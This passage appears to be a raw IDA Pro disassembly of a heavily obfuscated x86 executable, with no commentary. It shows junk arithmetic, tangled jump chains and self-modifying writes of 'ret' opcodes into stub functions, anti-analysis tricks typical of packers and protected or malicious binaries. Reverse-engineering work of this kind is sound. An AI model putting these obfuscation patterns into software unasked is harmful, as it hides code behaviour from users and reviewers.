var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043B3BE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442391 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A78D SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044AE81 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044DF00 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044F66F SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00456B31 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 00458586 SIZE 00000011 BYTES

		push	ebp
		push	edx
		push	esi
		pop	edx
		xchg	edx, [esp+8+var_8]
		push	edi
		push	ebx
		push	ecx
		jmp	loc_44F66F
sub_44023C	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_44024B:				; CODE XREF: sub_4507BF+43F9j
		ror	edi, 10h
		jmp	loc_446A51
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------

loc_440253:				; CODE XREF: y2kk37jd:004546BDj
		jl	loc_458AB5
		jnz	loc_458EBF
		sub	eax, ecx
		jmp	loc_4548D2
; ---------------------------------------------------------------------------
		mov	ds:dword_41E0EC, eax
		lea	eax, nullsub_492
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_492
; ---------------------------------------------------------------------------
		call	nullsub_35
		jmp	loc_445A65
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C4BC

loc_440284:				; CODE XREF: sub_44C4BC:loc_4560FCj
					; sub_44ECA8:loc_4593B7j
		xor	eax, 3817FF16h
		push	edi
		push	0AF43FBB5h
		pop	edi
		sub	edi, 0B26F3D51h
		xor	edi, 1AD63C31h
		jmp	loc_44D735
; END OF FUNCTION CHUNK	FOR sub_44C4BC
; ---------------------------------------------------------------------------

loc_4402A2:				; CODE XREF: y2kk37jd:loc_43B00Ej
		add	[ebp-28h], eax
		mov	eax, [ebp-28h]
		mov	[ebp-18h], eax
		push	7060F8Fh
		pop	eax
		or	eax, 4DF04E3Bh
		jmp	loc_43F1D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B1FD

loc_4402BC:				; CODE XREF: sub_43B1FD+B1B3j
		jz	loc_45A649

loc_4402C2:				; CODE XREF: sub_4532F4-12C18j
		jmp	nullsub_45
; END OF FUNCTION CHUNK	FOR sub_43B1FD
; ---------------------------------------------------------------------------

loc_4402C7:				; CODE XREF: y2kk37jd:0043D1F9j
		push	0F257BBAh
		and	eax, 33E7E3E4h
		add	ecx, ebp
		jmp	loc_45A649
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_60. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F2F2

loc_4402DA:				; CODE XREF: sub_43F2F2-2847j
		pop	edx
		sub	edx, edi

loc_4402DD:				; CODE XREF: y2kk37jd:0045126Bj
		jmp	loc_44D331
; END OF FUNCTION CHUNK	FOR sub_43F2F2
; ---------------------------------------------------------------------------

loc_4402E2:				; CODE XREF: y2kk37jd:0043B448j
		sub	al, 99h
		push	858DFFF6h
		pop	edx
		or	edx, 88DE39FBh
		add	edx, 0DBCF5D4Bh
		jmp	loc_456157
; ---------------------------------------------------------------------------

loc_4402FB:				; DATA XREF: y2kk37jd:0044C630o
		mov	ds:dword_440314, edx
; START	OF FUNCTION CHUNK FOR sub_445226

loc_440301:				; CODE XREF: sub_445226+23Dj
					; sub_44866D+Ej
		xchg	eax, edx
		call	sub_440CD1
		retn
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E8DA

loc_440308:				; CODE XREF: sub_43E8DA+18479j
		jmp	sub_445BB5
; END OF FUNCTION CHUNK	FOR sub_43E8DA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449734

loc_44030D:				; CODE XREF: sub_449734-7435j
		jmp	loc_4512C5
; END OF FUNCTION CHUNK	FOR sub_449734
; ---------------------------------------------------------------------------
		dw 3020h
dword_440314	dd 77E60000h		; DATA XREF: y2kk37jd:loc_4402FBw
					; sub_445226:loc_44545Br
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448A12

loc_440318:				; CODE XREF: sub_448A12+BA66j
		jmp	loc_43B041
; END OF FUNCTION CHUNK	FOR sub_448A12
; ---------------------------------------------------------------------------
		db 47h,	48h, 0F7h
dword_440320	dd 9C29A82Dh, 19336254h, 0D86C6471h ; DATA XREF: sub_44866D-78Ao
					; sub_445226+9F63o
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BAF

loc_44032D:				; CODE XREF: sub_443BAF+E417j
		jmp	loc_440E37
; END OF FUNCTION CHUNK	FOR sub_443BAF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BF5F

loc_440332:				; CODE XREF: sub_43BF5F+6D29j
		jmp	loc_4411E0
; END OF FUNCTION CHUNK	FOR sub_43BF5F

; =============== S U B	R O U T	I N E =======================================



sub_440337	proc near		; CODE XREF: sub_43B7F3+Ep
					; y2kk37jd:0043D921p ...

var_C		= dword	ptr -0Ch
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043D5E6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043D643 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043FA64 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043FB33 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0043FBCD SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00443401 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00444AB8 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00446C33 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00447209 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00448402 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00448E83 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044BA27 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044CAD9 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044E441 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004500A2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450C44 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452567 SIZE 00000001 BYTES
; FUNCTION CHUNK AT 00454A92 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 004555CE SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00456363 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457849 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457D37 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458563 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A4C6 SIZE 00000005 BYTES

		jnb	loc_44CAD9
		jmp	loc_448E83
sub_440337	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4514DE

loc_440342:				; CODE XREF: sub_4514DE:loc_4489ECj
		mov	byte ptr [eax],	0C3h
		jmp	loc_43FE46
; ---------------------------------------------------------------------------

loc_44034A:				; CODE XREF: y2kk37jd:loc_44006Dj
					; sub_4514DE:loc_4563DBj
		mov	eax, [esp+8+var_8]
		push	edx
		call	sub_446819
		jmp	loc_44EEA8
; END OF FUNCTION CHUNK	FOR sub_4514DE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_152. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4432FD

loc_440359:				; CODE XREF: sub_4432FD+9F65j
		jmp	loc_446C28
; END OF FUNCTION CHUNK	FOR sub_4432FD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454D0F

loc_44035E:				; CODE XREF: sub_454D0F-F4D3j
		jmp	loc_4550AB
; END OF FUNCTION CHUNK	FOR sub_454D0F
; ---------------------------------------------------------------------------

loc_440363:				; CODE XREF: y2kk37jd:0043F2A0j
		jno	loc_43B8CB
		jo	loc_453B61

; =============== S U B	R O U T	I N E =======================================



sub_44036F	proc near		; CODE XREF: sub_440337+18232p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043B7C0 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00448B11 SIZE 00000011 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	edi
		push	0F9AD9530h
		jmp	loc_448B11
sub_44036F	endp

; ---------------------------------------------------------------------------
		dw 8A0Fh
		dd 0FFFFCAC4h, 0C885E923h, 13296E9h, 0D6850F00h, 0E9FFFFDCh
		dd 0FFFFE8A0h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442938

loc_440398:				; CODE XREF: sub_442938+6j
		xchg	edx, [esp+4+var_4]
		mov	ebp, edx
		pop	edx
		mov	eax, ds:dword_447328
		or	eax, eax
		jnz	loc_44B159
		jmp	loc_456A9B
; END OF FUNCTION CHUNK	FOR sub_442938
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_327. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A011

loc_4403B2:				; CODE XREF: sub_44A011+103F8j
		jmp	nullsub_315
; END OF FUNCTION CHUNK	FOR sub_44A011
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_4403B7:				; CODE XREF: sub_4458DD-1A89j
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440F0C

loc_4403BC:				; CODE XREF: sub_440F0C+1A152j
		sbb	edi, ecx
		jmp	loc_43F3CF
; END OF FUNCTION CHUNK	FOR sub_440F0C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_4403C3:				; CODE XREF: sub_4411C3+CAB1j
		mov	eax, edx
		nop
		mov	eax, [esp+0]
		push	ebp
		mov	ebp, eax
		jmp	loc_44B1AB
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4403D1:				; CODE XREF: sub_445226:loc_45B8CBj
					; y2kk37jd:0045B8DAj
		add	edx, 1098CA73h
		call	sub_45C14C
		xor	edx, esi
		jmp	sub_4578A6
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44753E

loc_4403E3:				; CODE XREF: sub_44753E+65DBj
		mov	[esi], ecx
		jnb	loc_44CAD4
		jl	loc_44E12B

loc_4403F1:				; CODE XREF: sub_44753E:loc_44DB11j
		or	esi, 0E7A45011h
		test	esi, 80h
		jmp	loc_445860
; END OF FUNCTION CHUNK	FOR sub_44753E
; ---------------------------------------------------------------------------

loc_440402:				; CODE XREF: y2kk37jd:loc_43FDE1j
		push	179258E6h
		shr	ecx, 7
		jmp	loc_43FA23
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44606C

loc_44040F:				; CODE XREF: sub_44606C:loc_458F0Bj
		call	sub_442C3E
		push	edx
		push	0B155C01Ah
		pop	edx
		jmp	loc_448736
; END OF FUNCTION CHUNK	FOR sub_44606C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451C7D

loc_440420:				; CODE XREF: sub_451C7D:loc_44B4FEj
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_44170B
		jmp	loc_448339
; END OF FUNCTION CHUNK	FOR sub_451C7D
; ---------------------------------------------------------------------------
		xchg	ebx, [esp]
		mov	edx, ebx
		pop	ebx
		xchg	esi, [esp]
		mov	eax, esi
		pop	esi
		push	esi
		jmp	loc_440887
; ---------------------------------------------------------------------------

loc_440444:				; CODE XREF: y2kk37jd:0045956Fj
		rol	edi, 6
		and	edi, 2EB8DC1Bh
		rol	edi, 1Fh
		add	edi, 31E07Fh
		mov	[edi], eax
		pop	edi
		jmp	loc_4445B9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CC31

loc_44045E:				; CODE XREF: sub_44CC31+16j
		jl	loc_456B7F
		sub	ecx, 0E0832FA0h
		and	eax, esi
		push	ebx
		jmp	loc_456B7D
; END OF FUNCTION CHUNK	FOR sub_44CC31

; =============== S U B	R O U T	I N E =======================================



sub_440472	proc near		; DATA XREF: sub_43C851+155BAo

; FUNCTION CHUNK AT 0044683C SIZE 00000005 BYTES

		mov	[esi], eax
		pop	esi
		lea	eax, nullsub_10
		mov	byte ptr [eax],	0C3h
		jmp	loc_44683C
sub_440472	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		call	nullsub_481
		jmp	ds:dword_41E14C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B765

loc_44048E:				; CODE XREF: sub_43B765+6455j
		jmp	loc_44D29C
; END OF FUNCTION CHUNK	FOR sub_43B765
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_481. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		mov	[ecx-16FFFF6Eh], dl
		jle	short loc_4404EE
		add	[eax], eax

loc_44049E:				; DATA XREF: sub_44AA96+BD8Eo
		add	eax, [ebp-4]
		mov	[ebp-0Ch], eax
		mov	eax, [ebp-0Ch]
		cmp	eax, [ebp-14h]
		jb	loc_44D21A
		mov	eax, [ebp-10h]
		mov	eax, [eax+64h]
		jmp	loc_43CD64
; ---------------------------------------------------------------------------
		and	edx, 0E0C70CBEh
		jmp	loc_45AFF8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_292. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4404C7:				; CODE XREF: y2kk37jd:00442E02j
		jmp	loc_456373
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4423B4

loc_4404CC:				; CODE XREF: sub_4423B4+3j
		jmp	sub_440CD1
; END OF FUNCTION CHUNK	FOR sub_4423B4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44594E

loc_4404D1:				; CODE XREF: sub_44594E:loc_44595Bj
		jz	loc_45A9BD
		jmp	loc_44D477
; END OF FUNCTION CHUNK	FOR sub_44594E
; ---------------------------------------------------------------------------
		xor	esi, ebp
		push	1B0825F7h
		jmp	loc_448BE4
; ---------------------------------------------------------------------------
		jz	loc_446B0C

loc_4404EE:				; CODE XREF: y2kk37jd:0044049Aj
		add	eax, 7D0h
		mov	[ebp-8], eax
		push	2
		push	0
		push	0
		jmp	loc_44A2E6
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_440502:				; CODE XREF: sub_445226+15EB1j
		jmp	loc_43E98A
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442376

loc_440507:				; CODE XREF: sub_442376+6j
		push	edx
		mov	edx, edi
		xchg	edx, [esp+0]
		push	0D8E1A22Eh
		jmp	loc_43DDFE
; END OF FUNCTION CHUNK	FOR sub_442376
; ---------------------------------------------------------------------------
		push	31D73B45h
		jmp	loc_45614C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_440521:				; CODE XREF: sub_45B7AA-FF1Aj
		shl	ebx, 0Eh
		cdq

loc_440525:				; CODE XREF: sub_45B7AA:loc_43FA81j
		lea	eax, [ebp-26Fh]
		cmp	dword ptr [eax], 4742444Fh
		jz	loc_44D915
		jmp	loc_4568AF
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4593F8

loc_44053C:				; CODE XREF: sub_4593F8:loc_447482j
		mov	byte ptr [eax],	0C3h
		jmp	sub_43CF31
; END OF FUNCTION CHUNK	FOR sub_4593F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CF31

loc_440544:				; CODE XREF: sub_43CF31j
		xchg	esi, [esp+0]
		mov	edx, esi
		pop	esi
		mov	eax, [esp-4+arg_0]
		push	offset loc_4412DD
		jmp	loc_4437DD
; END OF FUNCTION CHUNK	FOR sub_43CF31
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C03C

loc_440557:				; CODE XREF: sub_45C03C:loc_4430D8j
		or	ecx, 0F1BE40BCh
		add	ecx, 0E84F631h
		xchg	ecx, [esp+4+var_4]
		jmp	loc_4564C3
; END OF FUNCTION CHUNK	FOR sub_45C03C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_362. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_44056C:				; CODE XREF: sub_43F911+15j
		jnz	loc_44D501
		jmp	loc_43BD22
; END OF FUNCTION CHUNK	FOR sub_43F911
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4504BC

loc_440577:				; CODE XREF: sub_4504BC:loc_44110Bj
		add	edx, 10465B5Bh
		xchg	edx, [esp+0]
		jmp	sub_43DE8B
; END OF FUNCTION CHUNK	FOR sub_4504BC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_440585:				; CODE XREF: sub_4458DD-4E0Fj
		sbb	ebx, eax
		test	ecx, esi
		jmp	loc_453E0C
; END OF FUNCTION CHUNK	FOR sub_4458DD

; =============== S U B	R O U T	I N E =======================================



sub_44058E	proc near		; DATA XREF: sub_447F91-7369o
		xchg	ecx, [esp+0]
		jmp	sub_4577FE
sub_44058E	endp

; ---------------------------------------------------------------------------
		test	al, al
		jz	loc_459D7B
		jmp	loc_459B54
; ---------------------------------------------------------------------------

loc_4405A3:				; CODE XREF: y2kk37jd:loc_44615Aj
		add	edi, 0A0E03639h
		xchg	edi, [esp]
		push	10h
		mov	eax, [ebp-8]
		jmp	loc_447140
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45866A

loc_4405B6:				; CODE XREF: sub_45866A:loc_454232j
		jnz	loc_44259A

loc_4405BC:				; CODE XREF: sub_43E5B9+7j
		jmp	sub_457F0C
; END OF FUNCTION CHUNK	FOR sub_45866A
; ---------------------------------------------------------------------------
		push	6781866Ah
		jg	loc_43CAA5
		adc	ebp, 46E2A1E1h
		add	ecx, esi
		jmp	loc_442594
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4459CC

loc_4405D9:				; CODE XREF: sub_4459CC+3A32j
		jns	loc_458ED4
; END OF FUNCTION CHUNK	FOR sub_4459CC
; START	OF FUNCTION CHUNK FOR sub_44B86B

loc_4405DF:				; CODE XREF: sub_44B86B+1Bj
		jmp	loc_43CDB0
; END OF FUNCTION CHUNK	FOR sub_44B86B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4477A2

loc_4405E4:				; CODE XREF: sub_4477A2+15j
		jmp	loc_44F3CA
; END OF FUNCTION CHUNK	FOR sub_4477A2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451464

loc_4405E9:				; CODE XREF: sub_451464-14DDFj
		jmp	loc_4446C9
; END OF FUNCTION CHUNK	FOR sub_451464
; ---------------------------------------------------------------------------
		push	0B6A48641h
		mov	[ebx], ebp
		jmp	loc_458ED2
; ---------------------------------------------------------------------------
		xor	edi, 52C81F89h
		jmp	sub_4460E8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E20

loc_440605:				; CODE XREF: sub_454E20-1310Cj
		jz	loc_44011C
		jmp	loc_4475AE
; END OF FUNCTION CHUNK	FOR sub_454E20
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_174. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_440611:				; CODE XREF: y2kk37jd:00454FE3j
		jmp	loc_4571BE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45120B

loc_440616:				; CODE XREF: sub_45120B-9950j
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_45120B
; ---------------------------------------------------------------------------

loc_44061B:				; CODE XREF: y2kk37jd:00447228j
		jmp	loc_44EB7C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442829

loc_440620:				; CODE XREF: sub_442829-2045j
		jmp	loc_457372
; END OF FUNCTION CHUNK	FOR sub_442829
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4412BF

loc_440625:				; CODE XREF: sub_4412BF+1AA7Dj
		add	eax, 477013BAh

loc_44062B:				; CODE XREF: y2kk37jd:00443A75j
		xchg	eax, [esp+0]
		jmp	loc_448959
; END OF FUNCTION CHUNK	FOR sub_4412BF
; ---------------------------------------------------------------------------
		push	edx
		mov	edx, eax
		xchg	edx, [esp]
		ror	eax, 1Ch
		push	ecx
		push	6527C49Ch
		jmp	loc_454FD0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4480CB

loc_440647:				; CODE XREF: sub_4480CB+460Cj
		push	offset sub_45919E
		jmp	nullsub_115
; END OF FUNCTION CHUNK	FOR sub_4480CB
; ---------------------------------------------------------------------------
		test	ebx, 0D1C73428h
		jmp	loc_43B0B9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_44065C:				; CODE XREF: sub_4411C3-44D9j
		test	eax, 6C815946h
		jmp	loc_456F85
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_440667:				; CODE XREF: sub_43ED19+167EAj
		jl	loc_43CC03
		jge	loc_43FF29
		jmp	loc_44E080
; END OF FUNCTION CHUNK	FOR sub_43ED19
; ---------------------------------------------------------------------------

loc_440678:				; CODE XREF: y2kk37jd:00442235j
		jnp	loc_4566BC
		jno	loc_4525FD
		jmp	sub_44EC21
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_477. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445787

loc_44068A:				; CODE XREF: sub_445787:loc_450A63j
		mov	byte ptr [eax],	0C3h
		jmp	loc_441EC7
; END OF FUNCTION CHUNK	FOR sub_445787
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444899

loc_440692:				; CODE XREF: sub_444899+1j
					; sub_45A2F9:loc_45ACCEj
		mov	eax, [esp+0]
		push	edx
		push	ecx
		push	0D31DAB2Eh
		pop	ecx
		jmp	loc_45BB50
; END OF FUNCTION CHUNK	FOR sub_444899

; =============== S U B	R O U T	I N E =======================================



sub_4406A2	proc near		; DATA XREF: y2kk37jd:0044E882o

; FUNCTION CHUNK AT 0044CBB4 SIZE 00000005 BYTES

		mov	ds:off_41E208, eax
		push	offset sub_445185
		jmp	loc_44CBB4
sub_4406A2	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_96. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4406B3:				; CODE XREF: sub_445226+D93Fj
		jmp	loc_44D8BF
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457533

loc_4406B8:				; CODE XREF: sub_457533-9249j
		jmp	loc_44905D
; END OF FUNCTION CHUNK	FOR sub_457533
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C6ED

loc_4406BD:				; CODE XREF: sub_45C6ED-46F0j
		jz	loc_452BB5
		jmp	loc_443238
; END OF FUNCTION CHUNK	FOR sub_45C6ED
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_513. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F7EA

loc_4406C9:				; CODE XREF: sub_44F7EA+Aj
		jmp	loc_43B195
; END OF FUNCTION CHUNK	FOR sub_44F7EA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D412

loc_4406CE:				; CODE XREF: sub_43D412+10FF7j
		jmp	loc_45AE21
; END OF FUNCTION CHUNK	FOR sub_43D412
; ---------------------------------------------------------------------------

loc_4406D3:				; DATA XREF: sub_4532F4+17o
		inc	dword ptr [ebp-8]
; START	OF FUNCTION CHUNK FOR sub_4532F4

loc_4406D6:				; CODE XREF: sub_4532F4:loc_44177Cj
					; sub_4532F4-640j
		mov	eax, [ebp-8]
		pop	ecx
		pop	ecx
		pop	ebp
		jmp	loc_4402C2
; END OF FUNCTION CHUNK	FOR sub_4532F4
; ---------------------------------------------------------------------------

loc_4406E1:				; CODE XREF: y2kk37jd:00454FB3j
		cmp	ebx, 13CBF87Ah
		jmp	loc_45BDDC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_4406EC:				; CODE XREF: sub_4411C3:loc_43B5D0j
		jg	loc_458BD7
		jmp	loc_4422C3
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454539

loc_4406F7:				; CODE XREF: sub_454539+5008j
		mov	eax, ebp
		jmp	loc_44A69A
; END OF FUNCTION CHUNK	FOR sub_454539
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455C79

loc_4406FE:				; CODE XREF: sub_455C79+1A34j
		jl	loc_43FCF8
		cdq
		sbb	edi, 0FB703289h
		jmp	loc_43FCEA
; END OF FUNCTION CHUNK	FOR sub_455C79
; ---------------------------------------------------------------------------
		push	7B31A4C8h
		pop	edx
		add	edx, 4DBF2C6h
		test	edx, 10h
		jmp	loc_44C17B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DE9F

loc_440727:				; CODE XREF: sub_44DE9F:loc_4450A8j
					; sub_44DE9F-8DE8j
		xor	edi, 0FDF94099h
		jnz	loc_443140
; END OF FUNCTION CHUNK	FOR sub_44DE9F
; START	OF FUNCTION CHUNK FOR sub_44615F

loc_440733:				; CODE XREF: sub_44615F+9j
		jmp	loc_4558C7
; END OF FUNCTION CHUNK	FOR sub_44615F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447407

loc_440738:				; CODE XREF: sub_447407-6558j
		jmp	loc_453594
; END OF FUNCTION CHUNK	FOR sub_447407
; ---------------------------------------------------------------------------
		rol	edi, 8
		add	edi, 693306E9h
		cmp	ebp, 946E1A0Dh
		jmp	loc_44313A
; ---------------------------------------------------------------------------

loc_440751:				; CODE XREF: y2kk37jd:004541CDj
		add	edi, ebx

; =============== S U B	R O U T	I N E =======================================



sub_440753	proc near		; CODE XREF: sub_4468E0+CD96p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043B9D4 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		xchg	ecx, [esp-4+arg_0]
		call	sub_446819
		mov	eax, 276E7523h
		call	sub_442C3E
		push	offset loc_44D983
		jmp	loc_43B9D4
sub_440753	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457A46

loc_440773:				; CODE XREF: sub_457A46:loc_45A715j
		jz	loc_4548C7
		jmp	loc_459CB0
; END OF FUNCTION CHUNK	FOR sub_457A46
; ---------------------------------------------------------------------------

loc_44077E:				; DATA XREF: sub_446AC6+2680o
		xchg	edi, [esp]
		mov	eax, edi
		pop	edi
		rol	eax, 17h
		add	eax, 0D9AAA52h
		and	eax, 0EA32A432h
		xor	eax, 84096996h
		jmp	loc_45BB7D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442A84

loc_44079E:				; CODE XREF: sub_442A84+9FB2j
		jz	loc_43ECFC
		jmp	loc_44BF65
; END OF FUNCTION CHUNK	FOR sub_442A84
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_4407A9:				; CODE XREF: sub_4411C3+17895j
		push	557098E8h
		xchg	ecx, [esp+0]
		mov	edi, ecx
		pop	ecx
		or	edi, 8748DD7Dh
		test	edi, 200000h
		jmp	loc_442B92
; END OF FUNCTION CHUNK	FOR sub_4411C3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_387. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4407C6:				; CODE XREF: y2kk37jd:00442BCBj
		jmp	loc_4487AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DE8B

loc_4407CB:				; CODE XREF: sub_43DE8B+1A013j
		jl	loc_440BE6
; END OF FUNCTION CHUNK	FOR sub_43DE8B
; START	OF FUNCTION CHUNK FOR sub_442829

loc_4407D1:				; CODE XREF: sub_442829:loc_43BA87j
		mov	eax, 1D403CB1h
		call	sub_44113A
		add	eax, 8C1E4E83h
		rol	eax, 16h
		jmp	loc_440620
; ---------------------------------------------------------------------------

loc_4407E9:				; CODE XREF: sub_442829j
		mov	eax, ds:dword_45B410
		or	eax, eax
		jmp	loc_45624B
; END OF FUNCTION CHUNK	FOR sub_442829
; ---------------------------------------------------------------------------

loc_4407F6:				; CODE XREF: y2kk37jd:00444F45j
		mov	ecx, edx
		cmp	edx, ecx
		jmp	loc_43D74D

; =============== S U B	R O U T	I N E =======================================



sub_4407FF	proc near		; CODE XREF: y2kk37jd:004474A4p
					; y2kk37jd:004544ABj

